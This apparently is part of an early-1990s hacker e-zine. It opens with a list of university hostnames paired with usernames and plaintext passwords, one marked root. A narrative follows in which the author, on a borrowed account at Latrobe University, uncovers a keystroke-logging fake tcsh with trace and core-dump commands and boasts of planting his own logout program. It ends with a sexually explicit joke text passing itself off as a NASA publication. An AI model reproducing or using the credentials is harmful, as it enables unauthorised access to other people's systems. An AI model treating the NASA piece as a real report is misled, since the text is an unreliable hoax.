;  - molest.ugcs.caltech.edu
;  - through.ugcs.caltech.edu
;  - astride.ugcs.caltech.edu
;  - over.ugcs.caltech.edu
;  - opposite.ugcs.caltech.edu
;  - grate.ugcs.caltech.edu
;  - betwixt.ugcs.caltech.edu
vex.ugcs.caltech.edu	1991.7		YP	;U:quit P:password
vex.ugcs.caltech.edu	1991.7		YP	;U:lewicki P:password
vex.ugcs.caltech.edu	1991.7		YP	;U:cs12 P:cs12cs12
vex.ugcs.caltech.edu	1991.7		YP	;U:tal P:schwartz
vex.ugcs.caltech.edu	1991.7		YP	;U:sven P:peterson
vex.ugcs.caltech.edu	1991.7		YP	;U:calvin P:calvin
vex.ugcs.caltech.edu	1991.7		YP	;U:jessica P:absolute
vex;ugcs.caltech.edu	1991.7		YP	;U:bets P:hello

zed.cs.idaho.edu	1991.6		P0S7	;U:subv P:subversive (root)


            \                                                  /
            \   Latrobe Uni - Playing a game of entrapment.  /
              \                                              /
               \                      By                    /
                \                                          /
                 \            The Chthnic Hvee           /
                  \                                      /

  After using this account for a few days, I remembered what Prime Suspect
said when hegave it to me - "...tcsh seems a little on the small side...".
So I thought I better check it out...

latcs1% w
 xx:xx am  up xx days, xx:xx,  8 users,  load average: x.xx, x.xx, x.xx
User     tty       login@  idle   JCPU   PCPU  what
root     console   x:xxpm xx:xx      3         -cs
wcc      ttyh4     x:xxpm xx:xx                -
burns    ttyh9     x:xxpm xx:xx     22         -csh
parhar   ttyhb     x:xxpm xx:xx      2         -csh
wongm    ttyp0     x:xxam xx:xx     42         pc0 /tmp/pc0.28197.1.s -o /tmp/p
wes      ttyp1     :xxam xx:xx      2      2  -tcsh HOME=/home/guests/wes SHEL
song     ttyp3     x:xxpm xx:xx      2         -csh
ping     ttyq2     x:xxpm xx:xx                kermit

[ That tcsh looks just a little bit unusual, yeah? ]

latcs1% finger wes		[ Better have a look to see if it is the
default shell... ]

Login name: wes       			In real life: Work Experience Student
Directory: /home/guests/wes         	Shell: /bin/tcsh
On since Jul xx xx:xx:xx on ttypx from xx.xx.xx.xx
No unread mail
No Plan.

latcs1% wc etc/passwd
    460    1158   32472 /etc/passwd
latcs1% egrep tcsh /etc/passwd		[ Am I the only one? ]
wes:##wes:150:206:Work Experience Student,PSI 212B,1085:/home/guests/wes:/bin/t
[ I am, HMMM.... ]
latcs1% l -l /bin/tcsh	[ Ok lets have a look at this baby... ]

-rwx--x--x  1 root        24576 Oct 12  1990 /bin/tcsh*

[ Pretty small for tcsh isn't it???. Now why would one have tcsh unreadable? ]
latcs1% ps -guxa|egrep wes
wes      27492  0.0  0.1   56   40 p1 S    01:54   0:01 -tcsh HOME=/home/uests/
wes      27494  0.0  0.3   56   88 p1 S    01:54   0:01 -tcsh HOME=/home/guests/
wes      28218  0.0  1.8  240  552 p2 R    02:38   0:00 ps -guxa
wes      27899  0.0  0.3   56   88 r0 S    02:17   0:00 script
wes      27501  0.0  0.0   80    0 r0 IW   01:54   0:00 -bin/csh (csh)
wes     28219  0.0  1.0  120  304 p2 S    02:38   0:00 egrep wes
wes      27500  0.0  0.0   64    0 r0 IW   01:54   0:00 -bin/csh (csh)
wes      27900  0.0  1.0   64  304 p2 S    02:17   0:00 -h -i (csh)
wes      27898  0.0  0.1   40   40 r0 S    02:17   0:00 scrip
wes      27495  0.0  0.0   80    0 r0 IW   01:54   0:00 -csh (csh)
wes      28146  0.0  0.0  144    0 p2 TW   02:33   0:00 jove .cshrc

latcs1% trace -p 27492	[ What the hell is it upto I wonder... ]

Process 27492 attached - interrupt to quit
read (0, "t", 1024) = 1
rite (5, "t", 1) = t1
read (0, "h", 1024) = 1
write (5, "h", 1) = h1
read (0, "i", 1024) = 1
write (5, "i", 1) = i1
read (0, "s", 1024) = 1
write (5, "s", 1) = s1
read (0, " ", 1024) = 1
write (5, " ", 1) =  1
read (0, "i", 1024) = 
write (5, "i", 1) = i1
read (0, "s", 1024) = 1
write (5, "s", 1) = s1
read (0, " ", 1024) = 1		[ Just a LITTLE bit sus... ]
write (5, " ", 1) =  1
read (0, "a", 1024) = 1
write (5, "a", 1) = a1
read (0, " ", 1024) = 1
write (5, " ", 1) =  1
read (0, "t", 1024) = 1
write (5, "t", 1 = t1
read (0, "e", 1024) = 1
write (5, "e", 1) = e1
read (0, "s", 1024) = 1
write (5, "s", 1) = s1
read (0, "t", 1024) = 1
write (5, "t", 1) = t1
read (0, "\r", 1024) = 1
write (5, "\r", 1)= 1
read (0, "\3", 1024) = 1
write (5, "\3", 1) = ^C
Process 27492 detached

latcs1% ps -guxa|egrep tcsh

wes      27492  0.0  0.1   56   40 p1 S    01:54   0:01 -tcsh HOME=/home/guests/
wes      27494  0.0  0.3   56   88 p1 S    01:54   0:01 -tcsh HOME=/home/gusts/
wes      28237  0.0  1.0  120  304 p2 S    02:39   0:00 egrep tcsh

latcs1% gcore 27492		[ Now to find out what it really does... ]

gcore: core.27492 dumped

latcs1% strings core.27492|head -20	[ Here we go... 

B@/usr/adm/.log/Uwes	[ Oh SHIT.. ]
Be@(#)script.c		[ It seems my estimaite of the number of barstards in
4.5 (Berkeley) 83/07/02   the world just went up by one. ]
Inconsistancy with accounting, see your system administrator
Script started on %s
script done on %s
Out of pty's

latcs1% cd /usr/adm
latcs1% l
./		aculog.old	findsui.stop	lpd-errs.old	printer/
../	audit/		lastlog		messages	savacct
.log/	crontab_pyr	loadlog		messages.old	usracct
acct/		domain/		loadlog.old	msgbuf		wtmp
aculog		exception/	lpd-errs	pacct		wtmp.old

[ As if calling it ".log" rather than "log" would make any differance... ]

latcs1% cd .log
latcs1% l
. unreadable	[ Of course... ]
latcs1% l -l Uwes
-rw-------  1 wes           934 Jul xx xx:xx Uwes
latcs1% head -30 Uwes

Script started on xxx Jul xx xx:xx:xx AEST 1991
TERM = (vt100 

There is news.

1> nn

nn: Command not found.

2> rn

You seem to have left an rn running, process 7241.

That process does not seem to exist anymore.  The count of read articles

may be incorrect in the last nesgroup accessed by that other (defunct)


(The last newsgroup accessed was aus.jobs.)

[Type space to continue]

(Revising soft pointers--be patient.)

Unread news in melb.general                                2x articles

Unread news in melb.seminars                               9x articles

Unread news in control                                   38xx articles

Unread news in junk                                      78x articles

Unread news in bionet.molbio.gene-org                      1x articles


Checking active list for new newsgroups...


4> 5> logout

Script done on xxx xxx xx xx:xx:xx AEST 1991


[ end ]

   The file "Uwes" you see is actually not what it appears to be. It is the
output of a little program I installed into the logout sequence :-)

In future I advise you to be very careful of all the Melboune educational
ites, especially Latrobe... [ See Trax's file on tracing - Editor ]

- Hvee


                XXXXXX Experiment 8 Postflight Summary
                     NASA publication 14-307-1792


[ I found this in someones directory, along with some other information on NASA.
 Someone told me that this was posted to the UseNt, so I don't know exactly
 where this guy obtained it from. However I have included it, in the hopes
 that it will lighten up an otherwise very dry publication -Hvee ]


The purpose of this experiment was to prepare for the expected
participation in long-term space based research by husband-wife teams
once the US space station is in place.  To this end, the investigators
explored a number of possible approaches to continued marital relations
in the zero- orbital environment provided by the XXXXXX shuttle

Our primary conclusion is that satisfactory marital relations are within
the realm of possibility in zero-G, but that many couples would have
difficulty getting used tothe approaches we foundto be most


The number of married coubles currently involved in proposals for long-
term projects on the US space station has grown considerably in recent
years.  This raises the serious question of how such cuples will be
able to carry out normal marital relations without the aid of gravity.

Preliminary studies in the short-term weightless environment provided by
aircraft flying on balistic trajectories were sufficient to demonstrate
that there weeproblems, but the durtion of the zero-G environment on
such flights is too short to reach any satisfactory conclusions.
Similar experiments undertaken in a neutral bouyancy tank were equally
inconclusive because of the awkwardness of the breathing equipment.

The primary conclusion that could be drwn from these early experiments
was that the conventional approach to marital relationships (sometimes
described as the missionary approach) is highly dependent on gravity to
keep the partners together. This observation lead us to propose the set
f tests known as STS-75 Experiment 8.


The co-investigators had exclusive use of the lower deck of the shuttle
XXXXXXXX for 10 intervals of 1 hour each during the orbital portion of
the flight.  A resting period of a minimum of 4 hours was included in
the schedule between intervals. During each interval, the investigators
erected a pnumatic sound deadening barrier between the lower deck and
the flight deck (see NASA publication 12-571-3570) and carried out one
run of the experiment.

Each experimental run was planned in advance to test one approach to the
problem.  We made extensive use of a number of published sources in our
efforts to find satisfactory solutions see Appendix I), arriving at an
initial list of 20 reasonable solutions.  Of these, we used computer
simulation (using the mechaical dynamics simulation package from the
CADSI company) to determine the 10 most promising solutions.

Six solutions utilized mechanical restraints to simulate the effect of
gravity, while the others utilized only the efforts of the experimenters
to solve the problem.  Mechanical and unassisted runs were alternated,
and each experimental run was videotaped for later analysis.
Immediately after each run, the experimenters separately recorded their
observations, and then jointly reviewed the videotapes and recorded
joint observations.

The sensitive nature of the videotapes and first-hand observations pre-
cludes a public release of the raw data.  The investigators have pre-
pared this paper to summarize their results, and they intend to release
a training videotape for internal NAS use, constructed from selected
segments of the videotapes and additional narrative material.

The following summary is organized in two sections; the first covers the
mechanical solutions, while the second covers the "natural" approaches.
Each solution is described briefly, and then followed by a brief summary
of the result. Some summaries are combined.

                         SUMMARY OF RESULTS

1) An elastic belt around the waist of the two partners. The partners
   faced each other in the standard o missionary posture.

Entry was difficult and once it was achieved, it was difficult to
maintain.  With the belt worn around the hips, entry was easy, but it
was difficult to obtain the necessary thrusting motion; as a result,
this approach was not satisfactory.

2) Elastic belts around the thighs of the two partners. The female's
   buttocks were against the groin of the male, with her back against
   his chest.

An interesting experiment, but ultimately unsatisfactory because of the
difficulty of obtaining the necessary thrusting motion.

3) An elastic belt binding the thighs of the female to the waist of the
   male.  The female's buttocks were against the male's groin, while
   her knees straddled his chest.

Of the approaches tried with an elastic belt, this was by far the most
satisfatory. ntry was difficult, but after the female discovered how
to lock her toes over the male's thighs, it was found that she could
obtain the necessary thrusting motions.  The male found that his role
was unusually passive but pleasant.

One problem both partners noticed with all three elastic belt soltions
was that they reminded the partners of practices sometimes associated
with bondage, a subject that neither found particularly appealing.  For
couples who enjoy such associations, however, and especially for those
who routinely enoy female superior relations, this solution should be

4) An inflatable tunnel enclosing and pressing the partners together.
   The partners faced each other in the standard missionary posture.
   The tunnel enclosed the partners roughly from the knees to waist and
   pressed them together with an air pressure of approximately 0.01
   standard atmospheres.

Once properly aroused, the uniform pressure obtained from the tunnel was
sufficient to allow fairly normal marital relations, but getting aroused
while in the tunnel was ifficult, and once aroused outside the tunnel,
getting in was difficult. This problem made the entire approach largely

5) The same inflatable tunnel used in run 4, but enclosing the partners
   legs only.  The partners faced each other in the missionary

6)The same inflatable tunnel used in run 4, but with the partners in 
   the posture used for run 2.

Foreplay was satisfactory with both approaches; in the second case, we
found that it could be accomplished inside the tunnel, quite unlike our
exprience with run 4.  Unfortunately, we were unable to achieve entry
with either approach.

A general disadvantage of the inflatable tunnel approach was that the
tunnel itself tended to get sticky with sweat and other discharges. We
feel that the difficulty of keeping a tunnel clean in zero-G makes these
solutions most unsatisfactory.

7) The standard missionary posture, augmented by having the female hook
   her legs around the male's thighs and both partners hug each other.

8) The posture used in run 3, but with the female holding herelf
   against the male by gripping his buttocks with her heels.

Initially, these were very exciting and promising approaches, but as the
runs approached their climaxes, an unexpected problem arose. One or the
one or the other partner tended to let go, and the hold provided by the
remaining partner was insufficient to allow continued thrusts. We think
that partners with sufficient self-control might be able to use these
positions, but we found them frustrating.

9) The posture used in run 2, but with the male using his hands to hold
   th female while the female used her heels to hold the male's thighs.

Most of the responsibility for success rested on the male here, and we
were successful after a series of false starts, but we did not find the
experience to be particularly rewardn.

10) Each partner gripping the other's head between their thighs and
   hugging the other's hips with their arms.

This was the only run involving non-procreative marital relations, and it
was included largely because it provided the greatest number of distinct
ways foreach partner to hold the other.  This 4 points redundant hold
was good enough that we found this solution to be most satisfactory.  In
fact, it was more rewarding than analogous postures used in a
gravitational field.


We recommend that married couples considering maintaining their marital
relations during a space mission be provided with an elastic belt such
as we used for run 3 (see Appendix II).  In addition, we advise that a
training program be developed that recommends the solutions used in runs
and 10 and warns against the problems encountered in runs 7 and 8.

We recognize that any attempt by NASA to recommend approaches to marital
relationships will be politically risky, but we feel that, especially in
cases where long missions are planned, thoght be given to screening
couples applying to serve on such missions for their ability to accept
or adapt to the solutions used in runs 3 and 10.


                                 - THE END - 

 This is the end, my friend. See you next edition. Be careful, and good luck.

- Hvee